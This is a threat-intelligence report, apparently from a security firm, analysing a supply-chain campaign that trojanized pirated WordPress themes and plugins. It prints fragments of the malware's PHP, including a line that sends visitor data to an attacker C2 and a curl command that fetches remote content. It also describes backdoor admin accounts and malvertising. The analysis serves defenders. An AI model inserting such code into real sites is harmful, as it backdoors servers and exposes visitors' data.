PHP’s Labyrinth – Weaponized WordPress Themes & Plugins

19 February 2020


Prevailion’s Tailored Intelligence team has followed an active supply chain attack that has been ongoing since late 2017, we named this campaign “PHPs Labyrinth.” In this operation, threat actors have been able to surreptitiously install malicious files into a large number of Premium WordPress Themes and Plugins. We assess that the responsible party chose to target WordPress as it makes up 60% of all Content Management systems, and 34% of all websites on the internet. WordPress themes and plugins allow the average person to quickly and easily create a website through “drag and drop” features, rather than coding an entire website themselves.

The nefarious actor took advantage of an increased demand for premium themes, and managed to distribute them to various end-users through the use of specific WordPress marketplace platforms. These marketplace platforms were created by the threat actor; we were able to discover 30 different platforms used to distribute the trojanized themes and plugins. Three of the most popular webpages on these platforms were;

  • “Ultimate Support Chat” with approximately 700k views
  • “Woocomerence Product filter” with approximately 175k views and
  • “Slider Revolution v5.4.8.1” with approximately 125k views.

Thus far Prevailion has been able to identify over 20k actively compromised web servers worldwide, that are displaying evidence of compromise. This data is currently available on the Prevailion Apex platform. Based upon the number of views from the malicious platforms, we speculate that the total number of infected webservers is likely much higher, potentially in the hundreds of thousands. Due to the pandemic nature of this threat, Prevailion coordinated their efforts with appropriate U.S law enforcement on this campaign.

The attack commences when an unsuspecting victim uploads a trojanized theme to their web server. References to those trojanized files date back to stack overflow posts from October 2017. Once all the malicious files are downloaded, the threat actor gained full control over the web server – allowing them to add an administrative account, recover the web admin’s email account and WordPress password hash. If the password was recovered, from the hash and was used for multiple accounts, it could allow access to corporate resources.

In most cases we assess that the web servers ultimately became part of the Propeller Ads advertising network. Additional research shows that the Propeller Ads network has been associated with a plethora of malicious activity from different threat actors, including but not limited to malvertising and the Fallout exploit kit. This ad network is manipulated by attackers to become the contagion vector, allowing threat actors to remotely post malicious ads on otherwise benign websites. The malicious ads run javascript files, and surreptitiously install malware on victimized machines. If successful, this technique could allow the threat actor to steal usernames, passwords, and private files from victims’ computers.

WordPress Malware

PHP’s Labyrinth Campaign Walk Through

Infection source

The Prevailion team has been able to identify 30 platforms that served trojanized WordPress Themes. The most prominent websites appeared to be called The website description states that they offer “Thousands of free nulled, [a.k.a. pirated] WordPress Themes and Plugins.” When analyzing this cluster of WordPress platforms we observed a number of irregularities that make us believe they were fictitious, and managed by the same entity. For instance, sites had broken links to social media icons that took the visitor right back to the homepage, furthermore all the suspicious websites appeared to use the same template.

Screenshot of and website

To supplement this claim; in at least one instance the threat actor created domain, null24[.]icu, displayed the page header saying, Nulledzip[.]download, which is one of the other websites. That domain, nulledzip[.]download, was also flagged in a Digital Millennium Copyright Act takedown notice that can be found here.

Based off our analysis we have identified the following 30 websites that correlate to this cluster;

  • Null5[.]top,
  • Freedownload[.]network,
  • Downloadfreethemes[.]io,
  • Themesfreedownload[.]net,
  • Downloadfreethemes[.]co,
  • Downloadfreethemes[.]pw,
  • Wpfreedownload[.]press,
  • Freenulled[.]top,
  • Nulledzip[.]download,
  • Download-freethemes[.]download,
  • Wpmania[.]download,
  • Themesdad[.]com,
  • Downloadfreethemes[.]download,
  • Downloadfreethemes[.]space,
  • Download-freethemes[.]download,
  • Themesfreedownload[.]top,
  • Wpmania[.]download,
  • Premiumfreethemes[.]top,
  • Downloadfreethemes[.]space,
  • Downloadfreethemes[.]cc,
  • Freethemes[.]space,
  • Premiumfreethemes[.]top,
  • Downloadfreenulled[.]download,
  • Downloadfreethemes[.]download,
  • Freethemes[.]space,
  • Dlword[.]press,
  • Downloadnulled[.]pw,
  • 24x7themes[.]top,
  • null24[.]icu


The “class.theme-module.php” or “class.plugin-modules.php” file is the operative file that was added to the all the trojanized themes. The threat actor added functionality that allows for the command and control node to be changed to a “newdomain” periodically. The next function obtains a “$wp_auth_key” from one of the 1st stage C2s. Afterward it then writes the contents of the 1st stage C2 with the URL of code.php to a file called “wp-tmp.php”. The malware would perform host based reconnaissance and attempts to enumerate the following directories:

upload cli media template
uploads components modules Images
img includes plugins Css
administrator language tmp js
admin layouts upgrade image
Bin libraries engine file
cache logs templates files
wp-admin wp-content wp-includes

Next it checks to see if certain files exist; such as post.php, wp-vcd.php, if not it creates them on the system. It then copies the “WP_CD_Code” function to “wp-vcd.php”. This is the file that seems to have drawn the most attention over the past few years, and has been mentioned on WordPress web forums. The wp-vcd.php file copied the malicious code from the file “class.theme-modules.php” that was previously discussed.

Then it scans for a file named functions, if that file exists it will run “file get contents” on the 1st stage C2, HTTP_HOST, Password and Install hash.

One such command GET request would look like this{MD5hash}

Previously employed code will then repeat the process and iterate over two other domains with different generic Top-Level domains (gTLDs). We suspect that these domains serve as backup communications channels in case an issue arose with the primary domain. An example of the three URLs used in the December campaign were:

  • hxxp://www.vrilns[.]com/code[.]php
  • hxxp://www.vrilns[.]pw/code[.]php
  • hxxp://www.vrilns[.]top/code[.]php

Once the code creates the new wp-vcd.php file, it then deletes the file class.theme-module.php.

In this section we’ll examine the three files that were previously made by the loader script. Note that some of the files will be discussed throughout the report, in this section we show the files as they appear after the loader module was run once.

Newly Observed Shift in Tactics

We observed the threat actor altering their tactics, techniques and procedures (TTPs), starting in late December 2019 after a report detailing aspects of this activity was reported by another security firm. The most recent threat actor domain registered was frilns[.]com which used Alidns, Alibaba Cloud DNS, instead of CloudFare. The threat actor also no longer relied upon CloudFare hosting services and seemingly moved all the domains to a single IP address 94[.]156[.]175[.]170. One more change is that the threat actor removed the secondary and tertiary communications channels during the December to January 2020 timeframe.

1st Stage

At this point we see the threat actor taking action from their 1st stage server, adding code to the existing files on the compromised machine. One modified file was functions.php, the threat actor added a line of code to top of this file that would run the wp-vcd.php file. The next file modified was wp-tmp.php, as mentioned above this file contains an WP_AUTH_Key.  It was here that we took note of two additional sections of code.

The first section downloads additional code and adds it to the top of functions.php from a 1st stage C2. An example of this:

$file=file_get_contents(get_template_directory().’/functions.php’); $filec=file_get_contents(get_stylesheet_directory().’/functions.php’); $rep=””; $repw=””; if (stripos($file,$rep) !== false) { $new_file=str_replace($rep,$repw,$file); @file_put_contents(get_template_directory().’/functions.php’,$new_file); } if (stripos($filec,$rep) !== false) { $new_filec=str_replace($rep,$repw,$filec);

The second section of code adds a persistent cookie called “wordpress_cf_adm_use_adm” to anyone who visits the website – however the cookie would only be added to users who came to the website from one of the following search engines:

  • Google,
  • Yahoo,
  • Yandex,
  • MSN,
  • Baidu,
  • Bing
  • DoubleClick.

The cookie includes the referring search engine, as well as a reference to the compromised domain that was visited, and is set to persist for 1000 days. Once the cookie was attached to the end-user, their IP address is added to a list that lives in the file called “wp-feed.php.” The code used by the threat actor appears to slightly modify code that was found on another WordPress forum, that talked about how to target visitors of your site from search engines.

New Administrative Account

In order to ensure continued access to the infected websites, they also added an administrative account. This account allows them to simply log back into the website (with administrative privileges) at any time to alter any files. There was one variant of this malware reported by Astra, where the threat actor would create the username “wpadmin”. More recent reporting from Medium indicated that the threat actor kept this feature but  switched to utilizing a different username of “100010010”.

2nd Stage


We came back to the functions.php file to analyze the new code added during the last step. The new segment of code sets the max upload and post size to 128 Megabytes. It also specified that if the code took longer than 600 seconds to execute, it should stop. We hypothesize that these features were added to ensure their activity was not detected, as a hung process would be more likely to cause problems and be investigated by a responder.

            @ini_set( ‘upload_max_size’ , ‘128M’ );

@ini_set( ‘post_max_size’, ‘128M’);

@ini_set( ‘max_execution_time’, ‘600’ );

Next it will obtain the IP address, bot number, pack and user-agent string of the compromised machine and send them to a threat actor controlled C2.

$result=get_url(implode(“”,$hoho).”/logs/dolodos.php?url=”.urlencode(“http://”.$server_host.$_SERVER[“REQUEST_URI”]).”&ref=”.urlencode(@$_SERVER[“HTTP_REFERER”]).”&ip=”.checked_ip().”&bot=$bot_num&pck=$pck&uagent=”.urlencode($_SERVER[“HTTP_USER_AGENT”])); hxxp://dolodos[.]top

system(“chmod 755 $red_domain_path;curl -s http://piasuna[.]gdn/gen/actual_domain_my.php?pck=$pck | base64 > $red_domain_path”);

After identifying the URL pattern we were able to find another live C2 domain through Google, vosmas[.]icu/gen/actual_domain_my.php?pck=ip8.

Google Search for the URL path found in the deobfuscated functions.php file

Through our efforts we were able to identify the following domains:

  • vosmas[.]icu
  • tdreg[.]icu
  • tdreg[.]top
  • medsource[.]top
  • tretas[.]top
  • piastas[.]gdn
  • pervas[.]top
  • vtoras[.]top
  • dolodos[.]top
  • piasuna[.]gdn
  • semasa[.]icu
  • vosmas[.]icu
  • devata[.]icu

One notable aspect – some of these domains such as medsource[.]top simply contain instructions that redirect the output to tdreg[.]icu. So we suspect that some of the domains may act as relays for the tdreg[.]icu domain

Below this code there was another copy of the “WP_CD_Code” code that was referenced in the loader section of this report. We believe the threat actor copied this code to numerous files as a secondary means of persistence, in the event that one file is deleted by the systems administrator they retain access to the compromised wordpress domain.

Wp-tmp.php – Search Engine Optimization (SEO) component

This group calculated all the angles when it came to manipulating searches – another calculated effort was to raise the Search Engine Optimization (SEO) profile of the sites they controlled, creating a cost-effective means to draw more “clicks” and use that as a cost effect leverage to proliferate. To accomplish this, they run a series of commands on the compromised websites in order to enumerate the individual site. This included three functions for commands:

  • case ‘get_all_links’
  • ‘set_id_links’
  • case ‘create_page’

The first command obtains a list of the posts on a compromised wordpress site. The second command allows the attacker to add web links to existing web pages. The third command enables them to create new web pages on the compromised domain. In one file, the threat actor added links to one of the newly-controlled market places, offering their premium nulled themes. This was likely done to raise the SEO of these websites, ensuring they get more downloads and ultimately, more infections.

The functionality in this section appeared to closely mirror code found on another stack-overflow post, where the incident responder claimed to find the snippet saved in the file “post.php.” This is where the attackers can also add “keywords” to make the website more popular, likely in an attempt to raise the websites profile so it could display more ads. As noted by other researchers, in previous reporting this aspect of the campaign utilized the domain *.spekt[.]pw. The advertising component will be explained in the section below.

Ad-Blocker Script

In more recent versions of wp-tmp.php, there was a PHP script that would serve as an Anti- AdBlocker and was used through at least September 2019. This allows the website to display ads on the visited webpage, even if the end-user was using a program such as “Ad-Blocker”. Based upon lexicon analysis of the code found in the sample, the script appeared to be a slightly modified version of PHP code found on this web forum post from 2017.

Javascript – Advertising network

After the Ad-Blocker code, there is a line for a function called “slider_option” used to make asynchronous requests to two JavaScript files hosted on remote servers. These hostnames correspond to the advertising service Propeller Ads. Propellers Ads is an online ad service where various end users can bid to have their ads displayed on an otherwise begin website. While this has become a standard marketing technique, unfortunately it can also be abused by threat actors with more nefarious intentions. In order to ensure the correct person receives the advertisement revenue for displaying the ads, the accounts are identified by their zoneid.

A copy of the javascript used to invoke the ads is displayed below:

<script async=”async” type=”text/javascript” src=”//″></script>

<script src=”//″ data-cfasync=”false” async></script>’;

Propeller Ad Network

Generating Money through Advertisements 

Once the WordPress website was compromised, the threat actor appeared to be interested in generating revenue through the Propeller Ads network. While the propeller ad network presents itself like any other ad network, they have had a history of being used by criminal organizations for malicious purposes. Their extensive run history with various computer security firms resulted in an article being written about these activities by TechTarget in 2017.


Malvertising is when threat actors are able to display malicious ads, and run remote javascript files on otherwise benign websites. Cisco wrote a comprehensive report on advertising and malvertising last year that explains the marketing aspects of how paid advertising works. For those that are unfamiliar the client could chose a plan and would pay:

  • Every time the advertisement is shown (pay per impression)
  • Every time the advertisement is clicked (pay per click)
  • Every time the advertisement is shown, clicked, and something is ordered from the website (pay per order)

During the course of our investigation we visited a compromised domain and got the following URL. We have removed the domain and cep string from the URL to avoid identifying the victim.


From this example, we determined that the threat actor was receiving half a cent every time someone would click on the advertisement. In numerous cases, the advertisements were completely benign and would direct the end user to a legitimate service or website. In other cases however, we observed pop-up ads prompting the user to download potentially unwanted programs (PUP) or sometimes called Adware. These redirections could occur from a user clicking on a box to “allow notifications” or in some cases just clicking URLs embedded within the website. In one instance, we clicked on the “about us” link and received a pop up like the one below.

“Flash Player Update” Malvertising for Windows 10 machines from uniqueapps[.]app

In other cases the advertisements don’t look like advertisements at all, and mimic “Software Updates”.

“Software Update” Malvertising for OSX machines from tharbadir[.]com

If an end user clicks on the pop-up advertisement, it could install the potentially unwanted program on their local machine. Once on the local machine, these programs can continue to redirect the victim’s web browser to certain websites or even download additional malware from the internet.

Fallout Exploit Kit

The Nao Security’s twitter account, stated that they observed propeller ads redirect victims to domains associated with the Fallout Exploit Kit.

Image was created by Nao’s Security and posted on twitter – showing propellerads.php redirecting to an exploit kit

In addition to the screenshot above, other security firms such as FireEye have previously noted the Fallout Exploit Kit being propagated to victims through advertising networks. They noted that the victim would likely be served either a malvertising pop up, similar to those in the previous section, or connected to the exploit kit based upon the browser profile from the user-agent string and potentially the location of the victim. If the browser was successfully exploited by the kit, Viriback noted that it appeared to drop a variant of Zloader. The zloader agent has historically been used to further download additional payloads.

Compromise Intelligence Details

Once Prevailion was able to identify the command and control nodes associated with this particular campaign, we collected the associated telemetry information. We then cleaned the data using proprietary algorithms, thereby reducing bias and the rate of false positives. This refined data is called Evidence of Compromise (EoC), which allows us to create a global contagion snapshot representing a portion of impacted organizations. The map below denotes organizations that present EoC associated with PHP’s Labyrinth compromised web servers.

Prevailion Global Contagion Snapshot of EoC.

Based upon our telemetry, affected organizations are spread across a multitude of countries and sectors. As is typical with supply chain attacks, there was no clear targeting of any one individual sector, and so the resulting contagion map shows victimology that reflects largely upon the popularity of WordPress. Based upon our findings, we identified that small to medium sized businesses accounted for more than a fifth of all compromised entities, as they are the primary customers of premium third-party themes. This is most likely due to the fact that many lack the necessary funding or human capital to build a completely custom website, unlike larger, more established firms.

Additionally, we identified a number of more prominent victims, including but not limited to:

  • A decentralized crypto-mining website
  • A U.S. based stock trading firm
  • A small U.S. based bank
  • A government run petro/chemical organization
  • A U.S. based insurance company
  • A large U.S. based manufacturer
  • A U.S. payment card solution organization
  • A U.S. based IT services organization

While compromises of smaller third parties may first appear a nuisance, these instances can actually become quite dangerous later on down the road. Larger organizations typically have more money to invest in their cyber defense programs, so it becomes much easier to launch a campaign through a supply chain vendor, than it would be to directly attempt to infect a larger corporation. If left undetected, threat actors can use these initial infections to pivot, and affect larger organizations through their smaller, less defended third parties.


In order to protect against the WordPress malware, we recommend against using any pirated, a.k.a nulled, software. Organizations should instead utilize either open-source software or pay for premium themes. If your organization’s web server is running windows based operating systems, we recommend enabling and updating Windows Defender.

The default WordPress passwords are stored in their current state as a hybrid of MD5 hashes and PHP Pass, which are proven vulnerable to collision attacks. Through recovery of the username and MD5 hash, an attacker could find a collision offline to facilitate access to the organization’s corporate network. This emphasizes the problem of password reuse, which has plagued the industry. When configuring any WordPress website, we encourage web administrators to use more secure hashing algorithms, and to never reuse passwords across multiple accounts.

In order to curtail this threat posed to end-users from people visiting these compromised websites, we recommend using a plugin like NoScript that prevents remote javascript from running on your machine. We also recommend updating to the latest operating systems and web browser. This could help protect against certain exploit kits, which are known to target outdated web browsers. If you click on a malvertising ad, we recommend scanning your computer with an up-to-date version of antivirus to minimize the impact of the threat.


While the problem of compromised websites is not new, it will continue to plague end users, administrators, and the internet as a whole. As WordPress becomes even more prominent, it is an evermore appealing target for attackers. To make matters worse, all end-users need to do is download one malicious theme or even one plugin to compromise the integrity of the entire web server. In one instance we have observed a verified Themeforest purchaser ask questions on support forums about the malicious files and even included references to one of the command and control domains. We then downloaded that same theme but did not see any malicious files and suspect the end user likely downloaded an plugin from a malicious platform in conjugation with the themeforest theme.

At this time, the threat actor seems content with generating revenue off the advertising aspect of this campaign; however we cannot ignore the fact that in its present state, it has metastasized into a massive botnet, with all the potential issues that represents. This could also have far reaching impact as it gives other criminals a platform to perform malvertising and use various exploit kits to amplify their reach. We assess that exposing and countering this activity we are able impact, this activity and, other criminals we use these compromised sites as a platform to exploit various end-users having a ripple effect making everyone safer.

We believe that this campaign was able to occur for so long due to the placement of these web servers. Similar to the VPNFitler malware, these web servers are typically located outside of the companies standard perimeter. Many of these web servers are running without anti-virus software and are rarely checked except for when they go offline. This unique combination makes them an ideal target for attackers and we expect to see continued target of Web server and WordPress related software to remain a serious threat to network defenders.

Indicators of Compromise

1st stage domains





1st stage IP address


2nd stage domains






















1st stage samples: 






2nd stage samples:




















The Latest

Prevailion CEO, Karim Hijazi – Cheddar News- FCC commissioner calls on Apple and Google to ban TikTok app

A member of the FCC renewed urgency calls on Apple and Google to remove TikTok from their app stores, raising concerns that TikTok’s Chinese-based parent company is collecting user data that is being accessed in China.

IRONSCALES Cyber Security Heroes: The New Cyber Era Post Ukraine Invasion

What Wicked Webs We Un-weave

What Wicked Webs We Un-weave: Wizard Spider once again proving it isn’t you, it isn’t me; we search for things that you can’t see Authored by: Matt Stafford and Sherman Smith Executive summary: In late January 2022, Prevailion’s Adversarial Counterintelligence Team (PACT) identified extensive phishing activity designed to harvest credentials for Naver. Naver is a […]

Copyright 2022 Prevailion, Inc. All rights reserved.    

Disclaimer: Gartner “Cool Vendors in Security Operations and Threat Intelligence,” Mitchell Schneider, Ruggero Contu, John Watts, Craig Lawson, October 13, 2020. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Gartner Disclaimer: The GARTNER COOL VENDOR badge is a trademark and service mark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.